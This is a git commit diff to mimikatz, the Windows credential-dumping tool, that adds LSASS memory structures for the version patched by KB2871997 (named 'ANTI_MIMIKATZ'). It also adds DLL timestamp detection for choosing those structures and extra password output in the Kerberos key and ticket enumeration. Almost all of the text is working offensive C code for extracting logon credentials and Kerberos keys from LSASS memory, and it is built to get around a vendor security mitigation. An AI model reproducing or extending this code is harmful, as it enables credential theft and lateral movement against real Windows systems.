Structures for KB2871997 ;)
This commit is contained in:
Benjamin DELPY
parent
ba14c8b425
commit
8d83d5ab93
|
|
@ -46,6 +46,7 @@ const KUHL_M_SEKURLSA_ENUM_HELPER lsassEnumHelpers[] = {
|
|||
{sizeof(KIWI_MSV1_0_LIST_52), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_60), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_61), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_62), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_63), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, CredentialManager)},
|
||||
};
|
||||
|
|
@ -306,9 +307,13 @@ NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalDa
|
|||
else if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_8)
|
||||
helper = &lsassEnumHelpers[3];
|
||||
else if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE)
|
||||
helper = &lsassEnumHelpers[4];
|
||||
else
|
||||
helper = &lsassEnumHelpers[5];
|
||||
else
|
||||
helper = &lsassEnumHelpers[6];
|
||||
|
||||
if((cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_7) && (cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE) && (kuhl_m_sekurlsa_msv_package.Module.Informations.TimeDateStamp > 0x53480000))
|
||||
helper++; // yeah, really, I do that =)
|
||||
|
||||
|
||||
securityStruct.hMemory = cLsass.hLsassMem;
|
||||
securityStruct.address = LogonSessionListCount;
|
||||
|
|
@ -437,7 +442,6 @@ NTSTATUS kuhl_m_sekurlsa_pth(int argc, wchar_t * argv[])
|
|||
kull_m_string_args_byName(argc, argv, L"run", &szRun, L"cmd.exe");
|
||||
kprintf(L"user\t: %s\ndomain\t: %s\nprogram\t: %s\n", szUser, szDomain, szRun);
|
||||
|
||||
|
||||
if(kull_m_string_args_byName(argc, argv, L"aes128", &szAes128, NULL))
|
||||
{
|
||||
if(MIMIKATZ_NT_BUILD_NUMBER > KULL_M_WIN_MIN_BUILD_BLUE)
|
||||
|
|
@ -590,7 +594,7 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
|
|||
else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST)
|
||||
{
|
||||
pHashPassword = (PKERB_HASHPASSWORD_GENERIC) mesCreds;
|
||||
kprintf(L"\t%s : ", kuhl_m_kerberos_ticket_etype(pHashPassword->Type));
|
||||
kprintf(L"\t %s ", kuhl_m_kerberos_ticket_etype(pHashPassword->Type));
|
||||
if(buffer.Length = buffer.MaximumLength = (USHORT) pHashPassword->Size)
|
||||
{
|
||||
buffer.Buffer = (PWSTR) pHashPassword->Checksump;
|
||||
|
|
|
|||
|
|
@ -149,6 +149,43 @@ typedef struct _KIWI_MSV1_0_LIST_61 {
|
|||
PVOID CredentialManager;
|
||||
} KIWI_MSV1_0_LIST_61, *PKIWI_MSV1_0_LIST_61;
|
||||
|
||||
typedef struct _KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ {
|
||||
struct _KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ *Flink;
|
||||
struct _KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ *Blink;
|
||||
PVOID unk0;
|
||||
ULONG unk1;
|
||||
PVOID unk2;
|
||||
ULONG unk3;
|
||||
ULONG unk4;
|
||||
ULONG unk5;
|
||||
HANDLE hSemaphore6;
|
||||
PVOID unk7;
|
||||
HANDLE hSemaphore8;
|
||||
PVOID unk9;
|
||||
PVOID unk10;
|
||||
ULONG unk11;
|
||||
ULONG unk12;
|
||||
PVOID unk13;
|
||||
LUID LocallyUniqueIdentifier;
|
||||
LUID SecondaryLocallyUniqueIdentifier;
|
||||
BYTE waza[12]; /// to do (maybe align) <===================
|
||||
LSA_UNICODE_STRING UserName;
|
||||
LSA_UNICODE_STRING Domaine;
|
||||
PVOID unk14;
|
||||
PVOID unk15;
|
||||
PSID pSid;
|
||||
ULONG LogonType;
|
||||
ULONG Session;
|
||||
LARGE_INTEGER LogonTime; // autoalign x86
|
||||
LSA_UNICODE_STRING LogonServer;
|
||||
PKIWI_MSV1_0_CREDENTIALS Credentials;
|
||||
PVOID unk19;
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
ULONG unk22;
|
||||
PVOID CredentialManager;
|
||||
} KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, *PKIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ;
|
||||
|
||||
typedef struct _KIWI_MSV1_0_LIST_62 {
|
||||
struct _KIWI_MSV1_0_LIST_62 *Flink;
|
||||
struct _KIWI_MSV1_0_LIST_62 *Blink;
|
||||
|
|
|
|||
|
|
@ -5,7 +5,7 @@
|
|||
*/
|
||||
#include "kuhl_m_sekurlsa_credman.h"
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_credman_package = {L"credman", kuhl_m_sekurlsa_enum_logon_callback_credman, TRUE, L"lsasrv.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_credman_package = {L"credman", kuhl_m_sekurlsa_enum_logon_callback_credman, TRUE, L"lsasrv.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_credman_single_package[] = {&kuhl_m_sekurlsa_credman_package};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_credman(int argc, wchar_t * argv[])
|
||||
|
|
|
|||
|
|
@ -30,8 +30,8 @@ KULL_M_PATCH_GENERIC MasterKeyCacheReferences[] = {
|
|||
|
||||
PKIWI_MASTERKEY_CACHE_ENTRY pMasterKeyCacheList = NULL;
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_dpapi_lsa_package = {L"dpapi", NULL, FALSE, L"lsasrv.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_dpapi_svc_package = {L"dpapi", NULL, FALSE, L"dpapisrv.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_dpapi_lsa_package = {L"dpapi", NULL, FALSE, L"lsasrv.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_dpapi_svc_package = {L"dpapi", NULL, FALSE, L"dpapisrv.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_dpapi(int argc, wchar_t * argv[])
|
||||
{
|
||||
|
|
|
|||
|
|
@ -126,7 +126,7 @@ const KERB_INFOS kerbHelper[] = {
|
|||
},
|
||||
};
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_kerberos_package = {L"kerberos", kuhl_m_sekurlsa_enum_logon_callback_kerberos, TRUE, L"kerberos.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_kerberos_package = {L"kerberos", kuhl_m_sekurlsa_enum_logon_callback_kerberos, TRUE, L"kerberos.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_kerberos_single_package[] = {&kuhl_m_sekurlsa_kerberos_package};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_kerberos(int argc, wchar_t * argv[])
|
||||
|
|
@ -179,6 +179,8 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_tickets(IN PKIWI_BASIC_SECU
|
|||
PKIWI_KERBEROS_ENUM_DATA_TICKET ticketData = (PKIWI_KERBEROS_ENUM_DATA_TICKET) pOptionalData;
|
||||
DWORD i;
|
||||
kuhl_m_sekurlsa_printinfos_logonData(pData);
|
||||
kuhl_m_sekurlsa_enum_kerberos_callback_passwords(pData, Localkerbsession, RemoteLocalKerbSession, NULL);
|
||||
kprintf(L"\n");
|
||||
for(i = 0; i < 3; i++)
|
||||
{
|
||||
kprintf(L"\n\tGroup %u - %s", i, KUHL_M_SEKURLSA_KERBEROS_TICKET_TYPE[i]);
|
||||
|
|
@ -194,7 +196,8 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_keys(IN PKIWI_BASIC_SECURIT
|
|||
if(RemoteLocalKerbSession.address = *(PVOID *) ((PBYTE) Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetKeyList))
|
||||
{
|
||||
kuhl_m_sekurlsa_printinfos_logonData(pData);
|
||||
kprintf(L"\n\tKey List @ %p\n", RemoteLocalKerbSession.address);
|
||||
kuhl_m_sekurlsa_enum_kerberos_callback_passwords(pData, Localkerbsession, RemoteLocalKerbSession, NULL);
|
||||
kprintf(L"\n\t * Key List :\n");
|
||||
if(aLocalKeyMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structKeyListSize))
|
||||
{
|
||||
if(kull_m_memory_copy(&aLocalKeyMemory, &RemoteLocalKerbSession, kerbHelper[KerbOffsetIndex].structKeyListSize))
|
||||
|
|
@ -391,7 +394,7 @@ void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION
|
|||
if(App_KrbCred = kuhl_m_kerberos_ticket_createAppKrbCred(pKiwiTicket))
|
||||
{
|
||||
if(kull_m_file_writeData(filename, (PBYTE) App_KrbCred, kull_m_asn1_getSize(App_KrbCred)))
|
||||
kprintf(L"\n\t * Saved to file %s !\n", filename);
|
||||
kprintf(L"\n\t * Saved to file %s !", filename);
|
||||
else PRINT_ERROR_AUTO(L"kull_m_file_writeData");
|
||||
LocalFree(App_KrbCred);
|
||||
}
|
||||
|
|
|
|||
|
|
@ -18,7 +18,7 @@ KULL_M_PATCH_GENERIC LiveReferences[] = {
|
|||
|
||||
PKIWI_LIVESSP_LIST_ENTRY LiveGlobalLogonSessionList = NULL;
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_livessp_package = {L"livessp", kuhl_m_sekurlsa_enum_logon_callback_livessp, FALSE, L"livessp.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_livessp_package = {L"livessp", kuhl_m_sekurlsa_enum_logon_callback_livessp, FALSE, L"livessp.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_livessp_single_package[] = {&kuhl_m_sekurlsa_livessp_package};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_livessp(int argc, wchar_t * argv[])
|
||||
|
|
|
|||
|
|
@ -9,7 +9,7 @@ const ANSI_STRING
|
|||
PRIMARY_STRING = {7, 8, "Primary"},
|
||||
CREDENTIALKEYS_STRING = {14, 15, "CredentialKeys"};
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_msv_package = {L"msv", kuhl_m_sekurlsa_enum_logon_callback_msv, TRUE, L"lsasrv.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_msv_package = {L"msv", kuhl_m_sekurlsa_enum_logon_callback_msv, TRUE, L"lsasrv.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_msv_single_package[] = {&kuhl_m_sekurlsa_msv_package};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_msv(int argc, wchar_t * argv[])
|
||||
|
|
|
|||
|
|
@ -23,7 +23,7 @@ KULL_M_PATCH_GENERIC SspReferences[] = {
|
|||
|
||||
PKIWI_SSP_CREDENTIAL_LIST_ENTRY SspCredentialList = NULL;
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_ssp_package = {L"ssp", kuhl_m_sekurlsa_enum_logon_callback_ssp, TRUE, L"msv1_0.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_ssp_package = {L"ssp", kuhl_m_sekurlsa_enum_logon_callback_ssp, TRUE, L"msv1_0.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_ssp_single_package[] = {&kuhl_m_sekurlsa_ssp_package};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_ssp(int argc, wchar_t * argv[])
|
||||
|
|
|
|||
|
|
@ -20,7 +20,7 @@ KULL_M_PATCH_GENERIC TsPkgReferences[] = {
|
|||
|
||||
PRTL_AVL_TABLE TSGlobalCredTable = NULL;
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_tspkg_package = {L"tspkg", kuhl_m_sekurlsa_enum_logon_callback_tspkg, TRUE, L"tspkg.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_tspkg_package = {L"tspkg", kuhl_m_sekurlsa_enum_logon_callback_tspkg, TRUE, L"tspkg.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_tspkg_single_package[] = {&kuhl_m_sekurlsa_tspkg_package};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_tspkg(int argc, wchar_t * argv[])
|
||||
|
|
|
|||
|
|
@ -27,7 +27,7 @@ KULL_M_PATCH_GENERIC WDigestReferences[] = {
|
|||
PKIWI_WDIGEST_LIST_ENTRY l_LogSessList = NULL;
|
||||
LONG offsetWDigestPrimary = 0;
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_wdigest_package = {L"wdigest", kuhl_m_sekurlsa_enum_logon_callback_wdigest, TRUE, L"wdigest.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_wdigest_package = {L"wdigest", kuhl_m_sekurlsa_enum_logon_callback_wdigest, TRUE, L"wdigest.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_wdigest_single_package[] = {&kuhl_m_sekurlsa_wdigest_package};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_wdigest(int argc, wchar_t * argv[])
|
||||
|
|
|
|||
|
|
@ -78,6 +78,7 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
|
|||
moduleInformation.DllBase.address = pLdrEntry->DllBase;
|
||||
moduleInformation.SizeOfImage = pLdrEntry->SizeOfImage;
|
||||
moduleInformation.NameDontUseOutsideCallback = &pLdrEntry->BaseDllName;
|
||||
kull_m_process_adjustTimeDateStamp(&moduleInformation);
|
||||
continueCallback = callBack(&moduleInformation, pvArg);
|
||||
}
|
||||
status = STATUS_SUCCESS;
|
||||
|
|
@ -98,6 +99,7 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
|
|||
moduleName.Length = pLdrEntry32->BaseDllName.Length;
|
||||
moduleName.MaximumLength = pLdrEntry32->BaseDllName.MaximumLength;
|
||||
moduleName.Buffer = (PWSTR) pLdrEntry32->BaseDllName.Buffer;
|
||||
kull_m_process_adjustTimeDateStamp(&moduleInformation);
|
||||
continueCallback = callBack(&moduleInformation, pvArg);
|
||||
}
|
||||
status = STATUS_SUCCESS;
|
||||
|
|
@ -129,7 +131,10 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
|
|||
{
|
||||
aBuffer.address = moduleName.Buffer; aProcess.address = LdrEntry.BaseDllName.Buffer;
|
||||
if(kull_m_memory_copy(&aBuffer, &aProcess, moduleName.MaximumLength))
|
||||
{
|
||||
kull_m_process_adjustTimeDateStamp(&moduleInformation);
|
||||
continueCallback = callBack(&moduleInformation, pvArg);
|
||||
}
|
||||
LocalFree(moduleName.Buffer);
|
||||
}
|
||||
}
|
||||
|
|
@ -163,7 +168,10 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
|
|||
{
|
||||
aBuffer.address = moduleName.Buffer; aProcess.address = (PVOID) LdrEntry32.BaseDllName.Buffer;
|
||||
if(kull_m_memory_copy(&aBuffer, &aProcess, moduleName.MaximumLength))
|
||||
{
|
||||
kull_m_process_adjustTimeDateStamp(&moduleInformation);
|
||||
continueCallback = callBack(&moduleInformation, pvArg);
|
||||
}
|
||||
LocalFree(moduleName.Buffer);
|
||||
}
|
||||
}
|
||||
|
|
@ -185,6 +193,7 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
|
|||
if(pMinidumpString = (PMINIDUMP_STRING) kull_m_minidump_RVAtoPTR(memory->pHandleProcessDmp->hMinidump, pMinidumpModuleList->Modules[i].ModuleNameRva))
|
||||
{
|
||||
RtlInitUnicodeString(&moduleName, wcsrchr(pMinidumpString->Buffer, L'\\') + 1);
|
||||
kull_m_process_adjustTimeDateStamp(&moduleInformation);
|
||||
continueCallback = callBack(&moduleInformation, pvArg);
|
||||
}
|
||||
}
|
||||
|
|
@ -200,6 +209,17 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
|
|||
return status;
|
||||
}
|
||||
|
||||
void kull_m_process_adjustTimeDateStamp(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION information)
|
||||
{
|
||||
PIMAGE_NT_HEADERS ntHeaders;
|
||||
if(kull_m_process_ntheaders(&information->DllBase, &ntHeaders))
|
||||
{
|
||||
information->TimeDateStamp = ntHeaders->FileHeader.TimeDateStamp;
|
||||
LocalFree(ntHeaders);
|
||||
}
|
||||
else information->TimeDateStamp = 0;
|
||||
}
|
||||
|
||||
BOOL CALLBACK kull_m_process_callback_moduleForName(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg)
|
||||
{
|
||||
if(((PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION_FOR_NAME) pvArg)->isFound = RtlEqualUnicodeString(pModuleInformation->NameDontUseOutsideCallback, ((PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION_FOR_NAME) pvArg)->name, TRUE))
|
||||
|
|
|
|||
|
|
@ -323,6 +323,7 @@ extern NTSTATUS WINAPI RtlCreateUserThread(IN HANDLE Process, IN OPTIONAL PSECUR
|
|||
typedef struct _KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION{
|
||||
KULL_M_MEMORY_ADDRESS DllBase;
|
||||
ULONG SizeOfImage;
|
||||
ULONG TimeDateStamp;
|
||||
PCUNICODE_STRING NameDontUseOutsideCallback;
|
||||
} KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION, *PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION;
|
||||
|
||||
|
|
@ -345,6 +346,7 @@ BOOL kull_m_process_getProcessIdForName(LPCWSTR name, PDWORD processId);
|
|||
|
||||
typedef BOOL (CALLBACK * PKULL_M_MODULE_ENUM_CALLBACK) (PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg);
|
||||
NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE memory, PKULL_M_MODULE_ENUM_CALLBACK callBack, PVOID pvArg);
|
||||
void kull_m_process_adjustTimeDateStamp(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION information);
|
||||
BOOL CALLBACK kull_m_process_callback_moduleForName(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg);
|
||||
BOOL CALLBACK kull_m_process_callback_moduleFirst(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg);
|
||||
BOOL kull_m_process_getVeryBasicModuleInformationsForName(PKULL_M_MEMORY_HANDLE memory, PCWSTR name, PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION informations);
|
||||
|
|
|
|||
Loading…
Reference in New Issue